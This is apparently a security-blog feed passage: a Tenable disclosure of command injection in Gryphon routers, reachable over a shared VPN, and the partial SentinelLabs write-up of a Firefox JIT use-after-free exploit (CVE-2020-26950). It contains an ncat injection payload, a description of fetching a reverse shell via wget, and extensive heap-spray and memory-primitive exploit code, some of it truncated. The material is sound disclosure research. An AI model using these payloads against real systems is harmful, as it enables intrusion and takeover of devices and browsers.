T1071 Command and Control Standard Application Layer Protocol Attempts to connect through HTTP
T1059 Command and Scripting Interpreter Starts CMD.EXE for commands execution Excel uses cmd and PowerShell to execute command
T1218

 

Signed Binary Proxy Execution Uses RUNDLL32.EXE and MSHTA.EXE to load library rundll32 is used to run the downloaded payload. Mshta is used to execute malicious JavaScript

Conclusion

Office documents have been used as an attack vector for many malware families in recent times. The Threat Actors behind these families are constantly changing their techniques in order to try and evade detection. McAfee Researchers are constantly monitoring the Threat Landscape to identify these changes in techniques to ensure our customers stay protected and can go about their daily lives without having to worry about these threats.

The post Emotet’s Uncommon Approach of Masking IP Addresses appeared first on McAfee Blog.

Rooting Gryphon Routers via Shared VPN

4 February 2022 at 18:15

🎵 This LAN is your LAN, this LAN is my LAN 🎵

Intro

In August 2021, I discovered and reported a number of vulnerabilities in the Gryphon Tower router, including several command injection vulnerabilities exploitable to an attacker on the router’s LAN. Furthermore, these vulnerabilities are exploitable via the Gryphon HomeBound VPN, a network shared by all devices which have enabled the HomeBound service.

The implications of this are that an attacker can exploit and gain complete control over victim routers from anywhere on the internet if the victim is using the Gryphon HomeBound service. From there, the attacker could pivot to attacking other devices on the victim’s home network.

In the sections below, I’ll walk through how I discovered these vulnerabilities and some potential exploits.

Initial Access

When initially setting up the Gryphon router, the Gryphon mobile application is used to scan a QR code on the base of the device. In fact, all configuration of the device thereafter uses the mobile application. There is no traditional web interface to speak of. When navigating to the device’s IP in a browser, one is greeted with a simple interface that is used for the router’s Parental Control type features, running on the Lua Configuration Interface (LuCI).

The physical Gryphon device is nicely put together. Removing the case was simple, and upon removing it we can see that Gryphon has already included a handy pin header for the universal asynchronous receiver-transmitter (UART) interface.

As in previous router work I used JTAGulator and PuTTY to connect to the UART interface. The JTAGulator tool lets us identify the transmit/receive data (txd / rxd) pins as well as the appropriate baud rate (the symbol rate / communication speed) so we can communicate with the device.

​​

Unfortunately the UART interface doesn’t drop us directly into a shell during normal device operation. However, while watching the boot process, we see the option to enter a “failsafe” mode.

Fs in the chat

Entering this failsafe mode does drop us into a root shell on the device, though the rest of the device’s normal startup does not take place, so no services are running. This is still an excellent advantage, however, as it allows us to grab any interesting files from the filesystem, including the code for the limited web interface.

Getting a shell via LuCI

Now that we have the code for the web interface (specifically the index.lua file at /usr/lib/lua/luci/controller/admin/) we can take a look at which urls and functions are available to us. Given that this is lua code, we do a quick ctrl-f (the most advanced of hacking techniques) for calls to os.execute(), and while most calls to it in the code are benign, our eyes are immediately drawn to the config_repeater() function.

function config_repeater()
  <snip> --removed variable setting for clarity
  cmd = “/sbin/configure_repeater.sh “ .. “\”” .. ssid .. “\”” .. “ “ .. “\”” .. key .. “\”” .. “ “ .. “\”” .. hidden .. “\”” .. “ “ .. “\”” .. ssid5 .. “\”” .. “ “ .. “\”” .. key5 .. “\”” .. “ “ .. “\”” .. mssid .. “\”” .. “ “ .. “\”” .. mkey .. “\”” .. “ “ .. “\”” .. gssid .. “\”” .. “ “ .. “\”” .. gkey .. “\”” .. “ “ .. “\”” .. ghidden .. “\”” .. “ “ .. “\”” .. country .. “\”” .. “ “ .. “\”” .. bssid .. “\”” .. “ “ .. “\”” .. board .. “\”” .. “ “ .. “\”” .. wpa .. “\””
  os.execute(cmd)
os.execute(“touch /etc/rc_in_progress.txt”)
os.execute(“/sbin/mark_router.sh 2 &”)
luci.http.header(“Access-Control-Allow-Origin”,”*”)
luci.http.prepare_content(“application/json”)
luci.http.write(“{\”rc\”: \”OK\”}”)
end

The cmd variable in the snippet above is constructed using unsanitized user input in the form of POST parameters, and is passed directly to os.execute() in a way that would allow an attacker to easily inject commands.

This config_repeater() function corresponds to the url http://192.168.1.1/cgi-bin/luci/rc

Line 42: the answer to life, the universe, and command injections.

Since we know our input will be passed directly to os.execute(), we can build a simple payload to get a shell. In this case, stringing together commands using wget to grab a python reverse shell and run it.

Now that we have a shell, we can see what other services are active and listening on open ports. The most interesting of these is the controller_server service listening on port 9999.

controller_server and controller_client

controller_server is a service which listens on port 9999 of the Gryphon router. It accepts a number of commands in json format, the appropriate format for which we determined by looking at its sister binary, controller_client. The inputs expected for each controller_server operation can be seen being constructed in corresponding operations in controller_client.

Opening controller_server in Ghidra for analysis leads one fairly quickly to a large switch/case section where the potential cases correspond to numbers associated with specific operations to be run on the device.

In order to hit this switch/case statement, the input passed to the service is a json object in the format : {“<operationNumber>” : {“<op parameter 1>”:”param 1 value”, …}}.

Where the operation number corresponds to the decimal version of the desired function from the switch/case statements, and the operation parameters and their values are in most cases passed as input to that function.

Out of curiosity, I applied the elite hacker technique of ctrl-f-ing for direct calls to system() to see whether they were using unsanitized user input. As luck would have it, many of the functions (labelled operation_xyz in the screenshot above) pass user controlled strings directly in calls to system(), meaning we just found multiple command injection vulnerabilities.

As an example, let’s look at the case for operation 0x29 (41 in decimal):

In the screenshot above, we can see that the function parses a json object looking for the key cmd, and concatenates the value of cmd to the string “/sbin/uci set wireless.”, which is then passed directly to a call to system().

This can be trivially injected using any number of methods, the simplest being passing a string containing a semicolon. For example, a cmd value of “;id>/tmp/op41” would result in the output of the id command being output to the /tmp/op41 file.

The full payload to be sent to the controller_server service listening on 9999 to achieve this would be {“41”:{“cmd”:”;id>/tmp/op41”}}.

Additionally, the service leverages SSL/TLS, so in order to send this command using something like ncat, we would need to run the following series of commands:

echo ‘{“41”:{“cmd”:”;id>/tmp/op41"}}’ | ncat — ssl <device-ip> 9999

We can use this same method against a number of the other operations as well, and could create a payload which allows us to gain a shell on the device running as root.

Fortunately, the Gryphon routers do not expose port 9999 or 80 on the WAN interface, meaning an attacker has to be on the device’s LAN to exploit the vulnerabilities. That is, unless the attacker connects to the Gryphon HomeBound VPN.

HomeBound : Your LAN is my LAN too

Gryphon HomeBound is a mobile application which, according to Gryphon, securely routes all traffic on your mobile device through your Gryphon router before it hits the internet.

In order to accomplish this the Gryphon router connects to a VPN network which is shared amongst all devices connected to HomeBound, and connects using a static openvpn configuration file located on the router’s filesystem. An attacker can use this same openvpn configuration file to connect themselves to the HomeBound network, a class B network using addresses in the 10.8.0.0/16 range.

Furthermore, the Gryphon router exposes its listening services on the tun0 interface connected to the HomeBound network. An attacker connected to the HomeBound network could leverage one of the previously mentioned vulnerabilities to attack other routers on the network, and could then pivot to attacking other devices on the individual customers’ LANs.

This puts any customer who has enabled the HomeBound service at risk of attack, since their router will be exposing vulnerable services to the HomeBound network.

In the clip below we can see an attacking machine, connected to the HomeBound VPN, running a proof of concept reverse shell against a test router which has enabled the HomeBound service.

While the HomeBound service is certainly an interesting idea for a feature in a consumer router, it is implemented in a way that leaves users’ devices vulnerable to attack.

Wrap Up

An attacker being able to execute code as root on home routers could allow them to pivot to attacking those victims’ home networks. At a time when a large portion of the world is still working from home, this poses an increased risk to both the individual’s home network as well as any corporate assets they may have connected.

At the time of writing, Gryphon has not released a fix for these issues. The Gryphon Tower routers are still vulnerable to several command injection vulnerabilities exploitable via LAN or via the HomeBound network. Furthermore, during our testing it appeared that once the HomeBound service has been enabled, there is no way to disable the router’s connection to the HomeBound VPN without a factory reset.

It is recommended that customers who think they may be vulnerable contact Gryphon support for further information.

Update (April 8 2022): The issues have been fixed in updated firmware versions released by Gryphon. See the Solution section of Tenable’s advisory or contact Gryphon for more information: https://www.tenable.com/security/research/tra-2021-51


Rooting Gryphon Routers via Shared VPN was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Firefox JIT Use-After-Frees | Exploiting CVE-2020-26950

3 February 2022 at 16:30

Executive Summary

  • SentinelLabs worked on examining and exploiting a previously patched vulnerability in the Firefox just-in-time (JIT) engine, enabling a greater understanding of the ways in which this class of vulnerability can be used by an attacker.
  • In the process, we identified unique ways of constructing exploit primitives by using function arguments to show how a creative attacker can utilize parts of their target not seen in previous exploits to obtain code execution.
  • Additionally, we worked on developing a CodeQL query to identify whether there were any similar vulnerabilities that shared this pattern.

Contents

Introduction

At SentinelLabs, we often look into various complicated vulnerabilities and how they’re exploited in order to understand how best to protect customers from different types of threats.

CVE-2020-26950 is one of the more interesting Firefox vulnerabilities to be fixed. Discovered by the 360 ESG Vulnerability Research Institute, it targets the now-replaced JIT engine used in Spidermonkey, called IonMonkey.

Within a month of this vulnerability being found in late 2020, the area of the codebase that contained the vulnerability had become deprecated in favour of the new WarpMonkey engine.

What makes this vulnerability interesting is the number of constraints involved in exploiting it, to the point that I ended up constructing some previously unseen exploit primitives. By knowing how to exploit these types of unique bugs, we can work towards ensuring we detect all the ways in which they can be exploited.

Just-in-Time (JIT) Engines

When people think of web browsers, they generally think of HTML, JavaScript, and CSS. In the days of Internet Explorer 6, it certainly wasn’t uncommon for web pages to hang or crash. JavaScript, being the complicated high-level language that it is, was not particularly useful for fast applications and improvements to allocators, lazy generation, and garbage collection simply wasn’t enough to make it so. Fast forward to 2008 and Mozilla and Google both released their first JIT engines for JavaScript.

JIT is a way for interpreted languages to be compiled into assembly while the program is running. In the case of JavaScript, this means that a function such as:

function add() {
	return 1+1;
}

can be replaced with assembly such as:

push    rbp
mov     rbp, rsp
mov     eax, 2
pop     rbp
ret

This is important because originally the function would be executed using JavaScript bytecode within the JavaScript Virtual Machine, which compared to assembly language, is significantly slower.

Since JIT compilation is quite a slow process due to the huge amount of heuristics that take place (such as constant folding, as shown above when 1+1 was folded to 2), only those functions that would truly benefit from being JIT compiled are. Functions that are run a lot (think 10,000 times or so) are ideal candidates and are going to make page loading significantly faster, even with the tradeoff of JIT compilation time.

Redundancy Elimination

Something that is key to this vulnerability is the concept of eliminating redundant nodes. Take the following code:

function read(i) {
	if (i 

This would start as the following JIT pseudocode:

1. Guard that argument 'i' is an Int32 or fallback to Interpreter
2. Get value of 'i'
3. Compare GetValue2 to 10
4. If LessThan, goto 8
5. Get value of 'i'
6. Add 2 to GetValue5
7. Return Int32 Add6
8. Get value of 'i'
9. Add 1 to GetValue8
10. Return Add9 as an Int32

In this, we see that we get the value of argument i multiple times throughout this code. Since the value is never set in the function and only read, having multiple GetValue nodes is redundant since only one is required. JIT Compilers will identify this and reduce it to the following:

1. Guard that argument 'i' is an Int32 or fallback to Interpreter
2. Get value of 'i'
3. Compare GetValue2 to 10
4. If LessThan, goto 8
5. Add 2 to GetValue2
6. Return Int32 Add5
7. Add 1 to GetValue2
8. Return Add7 as an Int32

CVE-2020-26950 exploits a flaw in this kind of assumption.

IonMonkey 101

How IonMonkey works is a topic that has been covered in detail several times before. In the interest of keeping this section brief, I will give a quick overview of the IonMonkey internals. If you have a greater interest in diving deeper into the internals, the linked articles above are a must-read.

JavaScript doesn’t immediately get translated into assembly language. There are a bunch of steps that take place first. Between bytecode and assembly, code is translated into several other representations. One of these is called Middle-Level Intermediate Representation (MIR). This representation is used in Control-Flow Graphs (CFGs) that make it easier to perform compiler optimisations on.

Some examples of MIR nodes are:

  • MGuardShape - Checks that the object has a particular shape (The structure that defines the property names an object has, as well as their offset in the property array, known as the slots array) and falls back to the interpreter if not. This is important since JIT code is intended to be fast and so needs to assume the structure of an object in memory and access specific offsets to reach particular properties.
  • MCallGetProperty - Fetches a given property from an object.

Each of these nodes has an associated Alias Set that describes whether they Load or Store data, and what type of data they handle. This helps MIR nodes define what other nodes they depend on and also which nodes are redundant. For example, a node that reads a property will depend on either the first node in the graph or the most recent node that writes to the property.

In the context of the GetValue pseudocode above, these would have a Load Alias Set since they are loading rather than storing values. Since there are no Store nodes between them that affect the variable they’re loading from, they would have the same dependency. Since they are the same node and have the same dependency, they can be eliminated.

If, however, the variable were to be written to before the second GetValue node, then it would depend on this Store instead and will not be removed due to depending on a different node. In this case, the GetValue node is Aliasing with the node that writes to the variable.

The Vulnerability

With open-source software such as Firefox, understanding a vulnerability often starts with the patch. The Mozilla Security Advisory states:

CVE-2020-26950: Write side effects in MCallGetProperty opcode not accounted for
In certain circumstances, the MCallGetProperty opcode can be emitted with unmet assumptions resulting in an exploitable use-after-free condition.

The critical part of the patch is in IonBuilder::createThisScripted as follows:

IonBuilder::createThisScripted patch

To summarise, the code would originally try to fetch the object prototype from the Inline Cache using the MGetPropertyCache node (Lines 5170 to 5175). If doing so causes a bailout, it will next switch to getting the prototype by generating a MCallGetProperty node instead (Lines 5177 to 5180).

After this fix, the MCallGetProperty node is no longer generated upon bailout. This alone would likely cause a bailout loop, whereby the MGetPropertyCache node is used, a bailout occurs, then the JIT gets regenerated with the exact same nodes, which then causes the same bailout to happen (See: Definition of insanity).

The patch, however, has added some code to IonGetPropertyIC::update that prevents this loop from happening by disabling IonMonkey entirely for this script if the MGetPropertyCache node fails for JSFunction object types:

IonBuilder code to prevent a bailout-loop

So the question is, what’s so bad about the MCallGetProperty node?

Looking at the code, it’s clear that when the node is idempotent, as set on line 5179, the Alias Set is a Load type, which means that it will never store anything:

Alias Set when idempotent is true

This isn’t entirely correct. In the patch, the line of code that disables Ion for the script is only run for JSFunction objects when fetching the prototype property, which is exactly what IonBuilder::createThisScripted is doing, but for all objects.

From this, we can conclude that this is an edge case where JSFunction objects have a write side effect that is triggered by the MCallGetProperty node.

Lazy Properties

One of the ways that JavaScript engines improve their performance is to not generate things if not absolutely necessary. For example, if a function is created and is never run, parsing it to bytecode would be a waste of resources that could be spent elsewhere. This last-minute creation is a concept called laziness, and JSFunction objects perform lazy property resolution for their prototypes.

When the MCallGetProperty node is converted to an LCallGetProperty node and is then turned to assembly using the Code Generator, the resulting code makes a call back to the engine function GetValueProperty. After a series of other function calls, it reaches the function LookupOwnPropertyInline. If the property name is not found in the object shape, then the object class’ resolve hook is called.

Calling the resolve hook

The resolve hook is a function specified by object classes to generate lazy properties. It’s one of several class operations that can be specified:

The JSClassOps struct

In the case of the JSFunction object type, the function fun_resolve is used as the resolve hook.

The property name ID is checked against the prototype property name. If it matches and the JSFunction object still needs a prototype property to be generated, then it executes the ResolveInterpretedFunctionPrototype function:

The ResolveInterpretedFunctionPrototype function

This function then calls DefineDataProperty to define the prototype property, add the prototype name to the object shape, and write it to the object slots array. Therefore, although the node is supposed to only Load a value, it has ended up acting as a Store.

The issue becomes clear when considering two objects allocated next to each other:

If the first object were to have a new property added, there’s no space left in the slots array, which would cause it to be reallocated, as so:

In terms of JIT nodes, if we were to get two properties called x and y from an object called o, it would generate the following nodes:

1. GuardShape of object 'o'
2. Slots of object 'o'
3. LoadDynamicSlot 'x' from slots2
4. GuardShape of object 'o'
5. Slots of object 'o'
6. LoadDynamicSlot 'y' from slots5

Thinking back to the redundancy elimination, if properties x and y are both non-getter properties, there’s no way to change the shape of the object o, so we only need to guard the shape once and get the slots array location once, reducing it to this:

1. GuardShape of object 'o'
2. Slots of object 'o'
3. LoadDynamicSlot 'x' from slots2
4. LoadDynamicSlot 'y' from slots2

Now, if object o is a JSFunction and we can trigger the vulnerability above between the two, the location of the slots array has now changed, but the second LoadDynamicSlot node will still be using the old location, resulting in a use-after-free:

Use-after-free

The final piece of the puzzle is how the function IonBuilder::createThisScripted is called. It turns out that up a chain of calls, it originates from the jsop_call function. Despite the name, it isn’t just called when generating the MIR node for JSOp::Call, but also several other nodes:

The vulnerable code path will also only be taken if the second argument (constructing) is true. This means that the only opcodes that can reach the vulnerability are JSOp::New and JSOp::SuperCall.

Variant Analysis

In order to look at any possible variations of this vulnerability, Firefox was compiled using CodeQL and a query was written for the bug.

import cpp
 
// Find all C++ VM functions that can be called from JIT code
class VMFunction extends Function {
   VMFunction() {
       this.getAnAccess().getEnclosingVariable().getName() = "vmFunctionTargets"
   }
}
 
// Get a string representation of the function path to a given function (resolveConstructor/DefineDataProperty)
// depth - to avoid going too far with recursion
string tracePropDef(int depth, Function f) {
   depth in [0 .. 16] and
   exists(FunctionCall fc | fc.getEnclosingFunction() = f and ((fc.getTarget().getName() = "DefineDataProperty" and result = f.getName().toString()) or (not fc.getTarget().getName() = "DefineDataProperty" and result = tracePropDef(depth + 1, fc.getTarget()) + " -> " + f.getName().toString())))
}
 
// Trace a function call to one that starts with 'visit' (CodeGenerator uses visit, so we can match against MIR with M)
// depth - to avoid going too far with recursion
Function traceVisit(int depth, Function f) {
   depth in [0 .. 16] and
   exists(FunctionCall fc | (f.getName().matches("visit%") and result = f)or (fc.getTarget() = f and result = traceVisit(depth + 1, fc.getEnclosingFunction())))
}
 
// Find the AliasSet of a given MIR node by tracing from inheritance.
Function alias(Class c) {
   (result = c.getAMemberFunction() and result.getName().matches("%getAlias%")) or (result = alias(c.getABaseClass()))
}
 
// Matches AliasSet::Store(), AliasSet::Load(), AliasSet::None(), and AliasSet::All()
class AliasSetFunc extends Function {
   AliasSetFunc() {
       (this.getName() = "Store" or this.getName() = "Load" or this.getName() = "None" or this.getName() = "All") and this.getType().getName() = "AliasSet"
   }
}
 
from VMFunction f, FunctionCall fc, Function basef, Class c, Function aliassetf, AliasSetFunc asf, string path
where fc.getTarget().getName().matches("%allVM%") and f = fc.getATemplateArgument().(FunctionAccess).getTarget() // Find calls to the VM from JIT
and path = tracePropDef(0, f) // Where the VM function has a path to resolveConstructor (Getting the path as a string)
and basef = traceVisit(0, fc.getEnclosingFunction()) // Find what LIR node this VM function was created from
and c.getName().charAt(0) = "M" // A quick hack to check if the function is a MIR node class
and aliassetf = alias(c) // Get the getAliasSet function for this class
and asf.getACallToThisFunction().getEnclosingFunction() = aliassetf // Get the AliasSet returned in this function.
and basef.getName().substring(5, c.getName().suffix(1).length() + 5) = c.getName().suffix(1) // Get the actual node name (without the L or M prefix) to match against the visit* function
and (asf.toString() = "Load" or asf.toString() = "None") // We're only interested in Load and None alias sets.
select c, f, asf, basef, path

This produced a number of results, most of which were for properties defined for new objects such as errors. It did, however, reveal something interesting in the MCreateThis node. It appears that the node has AliasSet::Load(AliasSet::Any), despite the fact that when a constructor is called, it may generate a prototype with lazy evaluation, as described above.

However, this bug is actually unexploitable since this node is followed by either an MCall node, an MConstructArray node, or an MApplyArgs node. All three of these nodes have AliasSet::Store(AliasSet::Any), so any MSlots nodes that follow the constructor call will not be eliminated, meaning that there is no way to trigger a use-after-free.

Triggering the Vulnerability

The proof-of-concept reported to Mozilla was reduced by Jan de Mooij to a basic form. In order to make it readable, I’ve added comments to explain what each important line is doing:

function init() {
 
   // Create an object to be read for the UAF
   var target = {};
   for (var i = 0; i 

Exploiting CVE-2020-26950

Use-after-frees in Spidermonkey don’t get written about a lot, especially when it comes to those caused by JIT.

As with any heap-related exploit, the heap allocator needs to be understood. In Firefox, you’ll encounter two heap types:

  • Nursery - Where most objects are initially allocated.
  • Tenured - Objects that are alive when garbage collection occurs are moved from the nursery to here.

The nursery heap is relatively straight forward. The allocator has a chunk of contiguous memory that it uses for user allocation requests, an offset pointing to the next free spot in this region, and a capacity value, among other things.

Exploiting a use-after-free in the nursery would require the garbage collector to be triggered in order to reallocate objects over this location as there is no reallocation capability when an object is moved.

Due to the simplicity of the nursery, a use-after-free in this heap type is trickier to exploit from JIT code. Because JIT-related bugs often have a whole number of assumptions you need to maintain while exploiting them, you’re limited in what you can do without breaking them. For example, with this bug you need to ensure that any instructions you use between the Slots pointer getting saved and it being used when freed are not aliasing with the use. If they were, then that would mean that a second MSlots node would be required, preventing the use-after-free from occurring. Triggering the garbage collector puts us at risk of triggering a bailout, destroying our heap layout, and thus ruining the stability of the exploit.

The tenured heap plays by different rules to the nursery heap. It uses mozjemalloc (a fork of jemalloc) as a backend, which gives us opportunities for exploitation without touching the GC.

As previously mentioned, the tenured heap is used for long-living objects; however, there are several other conditions that can cause allocation here instead of the nursery, such as:

  • Global objects - Their elements and slots will be allocated in the tenured heap because global objects are often long-living.
  • Large objects - The nursery has a maximum size for objects, defined by the constant MaxNurseryBufferSize, which is 1024.

By creating an object with enough properties, the slots array will instead be allocated in the tenured heap. If the slots array has less than 256 properties in it, then jemalloc will allocate this as a “Small” allocation. If it has 256 or more properties in it, then jemalloc will allocate this as a “Large” allocation. In order to further understand these two and their differences, it’s best to refer to these two sources which extensively cover the jemalloc allocator. For this exploit, we will be using Large allocations to perform our use-after-free.

Reallocating

In order to write a use-after-free exploit, you need to allocate something useful in the place of the previously freed location. For JIT code this can be difficult because many instructions would stop the second MSlots node from being removed. However, it’s possible to create arrays between these MSlots nodes and the property access.

Array element backing stores are a great candidate for reallocation because of their header. While properties start at offset 0 in their allocated Slots array, elements start at offset 0x10:

A comparison between the elements backing store and the slots backing store

If a use-after-free were to occur, and an elements backing store was reallocated on top, the length values could be updated using the first and second properties of the Slots backing store.

To get to this point requires a heap spray similar to the one used in the trigger example above:

/*
   jitme - Triggers the vulnerability
*/
function jitme(cons, interesting, i) {
   interesting.x1 = 10; // Make sure the MSlots is saved
 
   new cons(); // Trigger the vulnerability - Reallocates the object slots
 
   // Allocate a large array on top of this previous slots location.
   let target = [0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, ... ]; // Goes on to 489 to be close to the number of properties ‘cons’ has
  
   // Avoid Elements Copy-On-Write by pushing a value
   target.push(i);
  
   // Write the Initialized Length, Capacity, and Length to be larger than it is
   // This will work when interesting == cons
   interesting.x1 = 3.476677904727e-310;
   interesting.x0 = 3.4766779039175e-310;
 
   // Return the corrupted array
   return target;
}
 
/*
   init - Initialises vulnerable objects
*/
function init() {
   // arr will contain our sprayed objects
   var arr = [];
 
   // We'll create one object...
   var cons = function() {};
   for(i=0; i

Which gets us to this layout:

Before and after the use-after-free is exploited

At this point, we have an Array object with a corrupted elements backing store. It can only read/write Nan-Boxed values to out of bounds locations (in this case, the next Slots store).

Going from this layout to some useful primitives such as ‘arbitrary read’, ‘arbitrary write’, and ‘address of’ requires some forethought.

Primitive Design

Typically, the route exploit developers go when creating primitives in browser exploitation is to use ArrayBuffers. This is because the values in their backing stores aren’t NaN-boxed like property and element values are, meaning that if an ArrayBuffer and an Array both had the same backing store location, the ArrayBuffer could make fake Nan-Boxed pointers, and the Array could use them as real pointers using its own elements. Likewise, the Array could store an object as its first element, and the ArrayBuffer could read it directly as a Float64 value.

This works well with out-of-bounds writes in the nursery because the ArrayBuffer object will be allocated next to other objects. Being in the tenured heap means that the ArrayBuffer object itself will be inaccessible as it is in the nursery. While the ArrayBuffer backing store can be stored in the tenured heap, Mozilla is already very aware of how it is used in exploits and have thus created a separate arena for them:

Instead of thinking of how I could get around this, I opted to read through the Spidermonkey code to see if I could come up with a new primitive that would work for the tenured heap. While there were a number of options related to WASM, function arguments ended up being the nicest way to implement it.

Function Arguments

When you call a function, a new object gets created called arguments. This allows you to access not just the arguments defined by the function parameters, but also those that aren’t:

function arg() {
   return arguments[0] + arguments[1];
}

arg(1,2);

Spidermonkey represents this object in memory as an ArgumentsObject. This object has a reserved property that points to an ArgumentsData backing store (of course, stored in the tenured heap when large enough), where it holds an array of values supplied as arguments.

One of the interesting properties of the arguments object is that you can delete individual arguments. The caveat to this is that you can only delete it from the arguments object, but an actual named parameter will still be accessible:

function arg(x) {
   console.log(x); // 1
   console.log(arguments[0]); // 1

   delete arguments[0]; // Delete the first argument (x)

   console.log(x); // 1
   console.log(arguments[0]); // undefined
}

arg(1);

To avoid needing to separate storage for the arguments object and the named arguments, Spidermonkey implements a RareArgumentsData structure (named as such because it’s rare that anybody would even delete anything from the arguments object). This is a plain (non-NaN-boxed) pointer to a memory location that contains a bitmap. Each bit represents an index in the arguments object. If the bit is set, then the element is considered “deleted” from the arguments object. This means that the actual value doesn’t need to be removed and arguments and parameters can share the same space without problems.

The benefit of this is threefold:

  • The RareArgumentsData pointer can be moved anywhere and used to read the value of an address bit-by-bit.
  • The current RareArgumentsData pointer has no NaN-Boxing so can be read with the out-of-bounds array, giving a leaked pointer.
  • The RareArgumentsData pointer is allocated in the nursery due to its size.

To summarise this, the layout of the arguments object is as so:

The layout of the three Arguments object types in memory

By freeing up the remaining vulnerable objects in our original spray array, we can then spray ArgumentsData structures using recursion (similar to this old bug) and reallocate on top of these locations. In JavaScript this looks like:

// Global that holds the total number of objects in our original spray array
TOTAL = 0;
 
// Global that holds the target argument so it can be used later
arg = 0;
 
/*
   setup_prim - Performs recursion to get the vulnerable arguments object
       arguments[0] - Original spray array
       arguments[1] - Recursive depth counter
       arguments[2]+ - Numbers to pad to the right reallocation size
*/
function setup_prim() {
   // Base case of our recursion
   // If we have reached the end of the original spray array...
   if(arguments[1] == TOTAL) {
 
       // Delete an argument to generate the RareArgumentsData pointer
       delete arguments[3];
 
       // Read out of bounds to the next object (sprayed objects)
       // Check whether the RareArgumentsData pointer is null
       if(evil[511] != 0) return arguments;
 
       // If it was null, then we return and try the next one
       return 0;
   }
 
   // Get the cons value
   let cons = arguments[0][arguments[1]];
 
   // Move the pointer (could just do cons.p481 = 481, but this is more fun)
   new cons();
 
   // Recursive call
   res = setup_prim(arguments[0], arguments[1]+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, ... ]; // Goes on to 480
 
   // If the returned value is non-zero, then we found our target ArgumentsData object, so keep returning it
   if(res != 0) return res;
 
   // Otherwise, repeat the base case (delete an argument)
   delete arguments[3];
 
   // Check if the next object has a null RareArgumentsData pointer
   if(evil[511] != 0) return arguments; // Return arguments if not
 
   // Otherwise just return 0 and try the next one
   return 0;
}
 
/*
   main - Performs the exploit
*/
function main() {
   ...
 
   //
   TOTAL=arr.length;
   arg = setup_prim(arr, i+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, ... ]; // Goes on to 480
}

Once the base case is reached, the memory layout is as so:

The tenured heap layout after the remaining slots arrays were freed and reallocated

Read Primitive

A read primitive is relatively trivial to set up from here. A double value representing the address needs to be written to the RareArgumentsData pointer. The arguments object can then be read from to check for undefined values, representing set bits:

/*
   weak_read32 - Bit-by-bit read
*/
function weak_read32(arg, addr) {
   // Set the RareArgumentsData pointer to the address
   evil[511] = addr;
 
   // Used to hold the leaked data
   let val = 0;
  
   // Read it bit-by-bit for 32 bits
   // Endianness is taken into account
   for(let i = 32; i >= 0; i--) {
       val = val = 0; i--) {
       val[0] = val[0] 

Write Primitive

Constructing a write primitive is a little more difficult. You may think we can just delete an argument to set the bit to 1, and then overwrite the argument to unset it. Unfortunately, that doesn’t work. You can delete the object and set its appropriate bit to 1, but if you set the argument again it will just allocate a new slots backing store for the arguments object and create a new property called ‘0’. This means we can only set bits, not unset them.

While this means we can’t change a memory address from one location to another, we can do something much more interesting. The aim is to create a fake object primitive using an ArrayBuffer’s backing store and an element in the ArgumentsData structure. The NaN-Boxing required for a pointer can be faked by doing the following:

  1. Write the double equivalent of the unboxed pointer to the property location.
  2. Use the bit-set capability of the arguments object to fake the pointer NaN-Box.

From here we can create a fake ArrayBuffer (A fake ArrayBuffer object within another ArrayBuffer backing store) and constantly update its backing store pointer to arbitrary memory locations to be read as Float64 values.

In order to do this, we need several bits of information:

  1. The address of the ArgumentsData structure (A tenured heap address is required).
  2. All the information from an ArrayBuffer (Group, Shape, Elements, Slots, Size, Backing Store).
  3. The address of this ArrayBuffer (A nursery heap address is required).

Getting the address of the ArgumentsData structure turns out to be pretty straight forward by iterating backwards from the RareArgumentsData pointer (As ArgumentsObject was allocated before the RareArgumentsData pointer, we work backwards) that was leaked using the corrupted array:

/*
   main - Performs the exploit
*/
function main() {
 
   ...
 
   old_rareargdat_ptr = evil[511];
   console.log("[+] Leaked nursery location: " + dbl_to_bigint(old_rareargdat_ptr).toString(16));
 
   iterator = dbl_to_bigint(old_rareargdat_ptr); // Start from this value
   counter = 0; // Used to prevent a while(true) situation
   while(counter 

The next step is to allocate an ArrayBuffer and find its location:

/*
   main - Performs the exploit
*/
function main() {
 
   ...
 
   // The target Uint32Array - A large size value to:
   //   - Help find the object (Not many 0x00101337 values nearby!)
   //   - Give enough space for 0xfffff so we can fake a Nursery Cell ((ptr & 0xfffffffffff00000) | 0xfffe8 must be set to 1 to avoid crashes)
   target_uint32arr = new Uint32Array(0x101337);
 
   // Find the Uint32Array starting from the original leaked Nursery pointer
   iterator = dbl_to_bigint(old_rareargdat_ptr);
   counter = 0; // Use a counter
   while(counter 

Now that the address of the ArrayBuffer has been found, a fake/clone of it can be constructed within its own backing store:

/*
   main - Performs the exploit
*/
function main() {
 
   ...
  
   // Create a fake ArrayBuffer through cloning
   iterator = arr_buf_addr;
   for(i=0;i

There is now a valid fake ArrayBuffer object in an area of memory. In order to turn this block of data into a fake object, an object property or an object element needs to point to the location, which gives rise to the problem: We need to create a NaN-Boxed pointer. This can be achieved using our trusty “deleted property” bitmap. Earlier I mentioned the fact that we can’t change a pointer because bits can only be set, and that’s true.

The trick here is to use the corrupted array to write the address as a float, and then use the deleted property bitmap to create the NaN-Box, in essence faking the NaN-Boxed part of the pointer:

A breakdown of how the NaN-Boxed value is put together

Using JavaScript, this can be done as so:

/*
   write_nan - Uses the bit-setting capability of the bitmap to create the NaN-Box
*/
function write_nan(arg, addr) {
   evil[511] = addr;
   for(let i = 64 - 15; i 

Finally, the write primitive can then be used by changing the fake_arrbuf backing store using target_uint32arr[14] and target_uint32arr[15]:

/*
   write - Write a value to an address
*/
function write(address, value) {
   // Set the fake ArrayBuffer backing store address
   address = dbl_to_bigint(address)
   target_uint32arr[14] = parseInt(address) & 0xffffffff
   target_uint32arr[15] = parseInt(address >> 32n);

   // Use the fake ArrayBuffer backing store to write a value to a location
   value = dbl_to_bigint(value);
   fake_arrbuf[1] = parseInt(value >> 32n);
   fake_arrbuf[0] = parseInt(value & 0xffffffffn);
}

The following diagram shows how this all connects together:

Address-Of Primitive

The last primitive is the address-of (addrof) primitive. It takes an object and returns the address that it is located in. We can use our fake ArrayBuffer for this by setting a property in our arguments object to the target object, setting the backing store of our fake ArrayBuffer to this location, and reading the address. Note that in this function we’re using our fake object to read the value instead of the bitmap. This is just another way of doing the same thing.

/*
   addrof - Gets the address of a given object
*/
function addrof(arg, o) {
